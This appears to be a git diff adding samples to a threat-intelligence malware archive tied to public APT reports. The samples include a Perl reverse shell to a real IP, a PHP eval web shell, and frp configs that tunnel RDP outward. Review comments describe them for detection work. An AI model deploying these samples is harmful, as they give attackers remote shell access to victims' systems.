2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/284a0c5cc0efe78f18c7b9b6dbe7be1d93da8f556b432f03d5464a34992dbd01
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/284a0c5cc0efe78f18c7b9b6dbe7be1d93da8f556b432f03d5464a34992dbd01
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2b70045d4878a20b8fca568c0b3414f2d255f3b2a7dfed85c84cf88d1b2f4e74
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2b70045d4878a20b8fca568c0b3414f2d255f3b2a7dfed85c84cf88d1b2f4e74
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2d03ff4e5d4d72afffd9bde9225fe03d6dc941982d6f3a0bbd14076a6c890247
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2d03ff4e5d4d72afffd9bde9225fe03d6dc941982d6f3a0bbd14076a6c890247
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3884ac554dcd58c871a4e55900f8847c9e308a79c321ae46ced58daa00d82ab4
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3884ac554dcd58c871a4e55900f8847c9e308a79c321ae46ced58daa00d82ab4
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3da95f33b6feb5dcc86d15e2a31e211e031efa2e96792ce9c459b6b769ffd6a4
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3da95f33b6feb5dcc86d15e2a31e211e031efa2e96792ce9c459b6b769ffd6a4
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/445ea69e361e8efd7e00cfc6c6204cb7cece7415b4eb6539c4ebf5e6b020f702
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/445ea69e361e8efd7e00cfc6c6204cb7cece7415b4eb6539c4ebf5e6b020f702
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/479742e205e1fcd9dadc600ee72f9c1e03ba6399d0a6535e558026d0fbbba07a
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/479742e205e1fcd9dadc600ee72f9c1e03ba6399d0a6535e558026d0fbbba07a
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4be7b1c2d862348ee00bcd36d7a6543f1ebb7d81f9c48f5dd05e19d6ccdfaeb5
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4be7b1c2d862348ee00bcd36d7a6543f1ebb7d81f9c48f5dd05e19d6ccdfaeb5
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4e77963ba7f70d6777a77c158fab61024f384877d78282d31ba7bbac06724b68
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4e77963ba7f70d6777a77c158fab61024f384877d78282d31ba7bbac06724b68
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4eced949a2da569ee9c4e536283dabad49e2f41371b6e8d40b80a79ec1b0e986
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4eced949a2da569ee9c4e536283dabad49e2f41371b6e8d40b80a79ec1b0e986
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/5b8b71d1140beaae4736eb58adc64930613ebeab997506fbb09aabff68242e17
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/5b8b71d1140beaae4736eb58adc64930613ebeab997506fbb09aabff68242e17
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/5f5af4762c073234fef6bfeaa3b9f6a04982e82a25e540116aa1f9e38223ae2b
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/5f5af4762c073234fef6bfeaa3b9f6a04982e82a25e540116aa1f9e38223ae2b
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/707e27d94b0d37dc55d7ca12d833ebaec80b50decb218a2eb79565561a807fe6
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/707e27d94b0d37dc55d7ca12d833ebaec80b50decb218a2eb79565561a807fe6
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/80fb33854bf54ceac731aed91c677d8fb933d1593eb95447b06bd9b80f562ed2
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/80fb33854bf54ceac731aed91c677d8fb933d1593eb95447b06bd9b80f562ed2
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/82ad34384fd3b37f85e735a849b033326d8ce907155f5ff2d24318b1616b2950
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/82ad34384fd3b37f85e735a849b033326d8ce907155f5ff2d24318b1616b2950
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/83e0db0fa3feaf911a18c1e2076cc40ba17a185e61623a9759991deeca551d8b
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/83e0db0fa3feaf911a18c1e2076cc40ba17a185e61623a9759991deeca551d8b
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/9c1ebd6f1800194b29720f626d51bf8f67310c4c59e67cd12e398dde234872ca
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/9c1ebd6f1800194b29720f626d51bf8f67310c4c59e67cd12e398dde234872ca
Normal file
Binary file not shown.
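--- a/2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/README.md
+++ b/2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/README.md
@@ -0,0 +1 @@
+https://team-cymru.com/blog/2020/12/16/mapping-out-aridviper-infrastructure-using-augurys-malware-addon/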
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/a6f4a0400fc7eee60610c0e113802d5aa544d462d2141b93203a0f9f380f0a16
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/a6f4a0400fc7eee60610c0e113802d5aa544d462d2141b93203a0f9f380f0a16
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/ab5b59331a1beeb857dc3476c3c3906869c66f4d281400bc079b07cd811959c4
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/ab5b59331a1beeb857dc3476c3c3906869c66f4d281400bc079b07cd811959c4
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/ae254ab021632cb583071079b2be8af62ccfc232c687a515a716ea17bfa0db9b
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/ae254ab021632cb583071079b2be8af62ccfc232c687a515a716ea17bfa0db9b
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b2ec6aeb55eb0acf12be51185e4d6b3e67e9f3931a0ce0ebbc5849f52c0d8fd3
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b2ec6aeb55eb0acf12be51185e4d6b3e67e9f3931a0ce0ebbc5849f52c0d8fd3
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b3e991914ca782b0b6f6a96d7df6d02e2388079a12e76dfacb47155fbff1084d
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b3e991914ca782b0b6f6a96d7df6d02e2388079a12e76dfacb47155fbff1084d
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b42d3deab6932e04d6a3fb059348e608f68464a6cdc1440518c1c5e66f937694
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b42d3deab6932e04d6a3fb059348e608f68464a6cdc1440518c1c5e66f937694
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b599b0327c4593a06a2e05a3373ee84c37faa6e4fd6f7e5c24544aa9192e0b43
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b599b0327c4593a06a2e05a3373ee84c37faa6e4fd6f7e5c24544aa9192e0b43
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b61fa79c6e8bfcb96f6e2ed4057f5a835a299e9e13e4c6893c3c3309e31cad44
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b61fa79c6e8bfcb96f6e2ed4057f5a835a299e9e13e4c6893c3c3309e31cad44
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/d08e7464fa8650e669012056548383fbadcd29a093a28eb7d0c2ba4e9036eb07
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/d08e7464fa8650e669012056548383fbadcd29a093a28eb7d0c2ba4e9036eb07
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/db1c2482063299ba5b1d5001a4e69e59f6cc91b64d24135c296ec194b2cab57a
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/db1c2482063299ba5b1d5001a4e69e59f6cc91b64d24135c296ec194b2cab57a
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/e67d6094dd5fa5ad678a36a020225c83adf97ac995c23893ffcc476f7d1f8481
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/e67d6094dd5fa5ad678a36a020225c83adf97ac995c23893ffcc476f7d1f8481
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/e869c7f981256ddb7aa1c187a081c46fed541722fa5668a7d90ff8d6b81c1db6
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/e869c7f981256ddb7aa1c187a081c46fed541722fa5668a7d90ff8d6b81c1db6
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/eab20d4c0eeff48e7e1b6b59d79cd169cac277aeb5f91f462f838fcd6835e0ac
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/eab20d4c0eeff48e7e1b6b59d79cd169cac277aeb5f91f462f838fcd6835e0ac
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/eda6d901c7d94cbd1c827dfa7c518685b611de85f4708a6701fcbf1a3f101768
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/eda6d901c7d94cbd1c827dfa7c518685b611de85f4708a6701fcbf1a3f101768
Normal file
Binary file not shown.
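--- a/2020-12-17_ClearSky-Pay2Kitten/3e35a2a6b58853ab7443aef40d22dc37c3d94848ec9f5b9ca27c1892082b4f07
+++ b/2020-12-17_ClearSky-Pay2Kitten/3e35a2a6b58853ab7443aef40d22dc37c3d94848ec9f5b9ca27c1892082b4f07
@@ -0,0 +1,12 @@
+[common]
+server_addr = 3.237.39.72
+server_port = 443
+tls_enable = true
+token = laksddflko986wq35029735
+
+[MedaTech - Optimus]
+type = tcp
+use_encryption = true
+local_ip = 127.0.0.1
+local_port = 3389
+remote_port = 0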
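Review bot: The proxy section header `[MedaTech - Optimus]` reads like an organisation and host label, so this sample (and `[BMT - BMTA-BES-TRM-07]` in the a2440df2… file later in this commit) may identify victims; confirm the names are already public in the linked ClearSky report before mirroring them. The keys look like an frp client configuration that exposes the local RDP service (`local_ip = 127.0.0.1`, `local_port = 3389`) through a TLS tunnel to `server_addr` on port 443, but nothing in the commit says so. The sample should stay byte-identical so it keeps matching its hash-style file name, which means the context belongs in the incident README, e.g. `3e35a2a6…, a2440df2…: frp client configs (RDP tunnel); identical token value links both`. For hunting, the two `server_addr` values and the shared `token` string are the pivots these files support.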
BIN
2020-12-17_ClearSky-Pay2Kitten/483fe88d70cb09361c27468b97b7f96bd667d8c915c9f004a27d4260367d551b
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/483fe88d70cb09361c27468b97b7f96bd667d8c915c9f004a27d4260367d551b
Normal file
Binary file not shown.
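--- a/2020-12-17_ClearSky-Pay2Kitten/48edd2cd9b09de0088c34020aea0bf40e226b22d629303ecee61a19d33ef3347
+++ b/2020-12-17_ClearSky-Pay2Kitten/48edd2cd9b09de0088c34020aea0bf40e226b22d629303ecee61a19d33ef3347
@@ -0,0 +1 @@
+use Socket;$i="52.90.144.40";$p=8443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};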
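Review bot: This one-line Perl sample and the PHP one in the next file (4a1fc30f…) are committed as live, renderable text with no description, so a reader only learns what they are by opening them. From the visible line the Perl file is a reverse shell that connects to `52.90.144.40` on port `8443` and hands the socket to `/bin/sh -i`; the PHP file evaluates base64-decoded data taken from a single POST field. I would record that in the incident README, e.g. `48edd2cd…: Perl reverse shell (remote address inside); 4a1fc30f…: PHP eval web shell`, and state there that the files are kept unmodified so they keep matching their hash-style names. For detection, the address/port pair and the literal POST field name are the stable strings these two samples offer for network and content signatures.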
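--- a/2020-12-17_ClearSky-Pay2Kitten/4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756
+++ b/2020-12-17_ClearSky-Pay2Kitten/4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756
@@ -0,0 +1 @@
+<?php @eval(base64_decode($_POST['citrix@kharpedar']));?>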
BIN
2020-12-17_ClearSky-Pay2Kitten/55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/63e81ac3c8e438221a088bc765158006cc99b2894d4340cf73305c43d67e9627
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/63e81ac3c8e438221a088bc765158006cc99b2894d4340cf73305c43d67e9627
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/6467152f27ba0d02dbd27e20403d8c5cdd86258df927a9cdaa9630cfc1fd3883
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/6467152f27ba0d02dbd27e20403d8c5cdd86258df927a9cdaa9630cfc1fd3883
Normal file
Binary file not shown.
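--- a/2020-12-17_ClearSky-Pay2Kitten/README.md
+++ b/2020-12-17_ClearSky-Pay2Kitten/README.md
@@ -0,0 +1 @@
+https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf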
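--- a/2020-12-17_ClearSky-Pay2Kitten/a2440df2bf11c2882d139bddf5a33bfd63dcb4b82994ac2daf7c7f08b7170647
+++ b/2020-12-17_ClearSky-Pay2Kitten/a2440df2bf11c2882d139bddf5a33bfd63dcb4b82994ac2daf7c7f08b7170647
@@ -0,0 +1,12 @@
+[common]
+server_addr = 54.174.216.48
+server_port = 443
+tls_enable = true
+token = laksddflko986wq35029735
+
+[BMT - BMTA-BES-TRM-07]
+type = tcp
+use_encryption = true
+local_ip = 127.0.0.1
+local_port = 3389
+remote_port = 0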
BIN
2020-12-17_ClearSky-Pay2Kitten/d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/df86cd16a3008dba00590edae31d1313bd92528aca92c4f4ea7f24000ba62547
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/df86cd16a3008dba00590edae31d1313bd92528aca92c4f4ea7f24000ba62547
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f
Normal file
Binary file not shown.
BIN
2020-12-17_ESET-Operation_SignSight_Southeast_Asia/6be34df727fcb79123e4e8f472ad24b698d83395fb17d4db019e9976f485cd83
Normal file
BIN
2020-12-17_ESET-Operation_SignSight_Southeast_Asia/6be34df727fcb79123e4e8f472ad24b698d83395fb17d4db019e9976f485cd83
Normal file
Binary file not shown.
Some files were not shown because too many files have changed in this diff Show More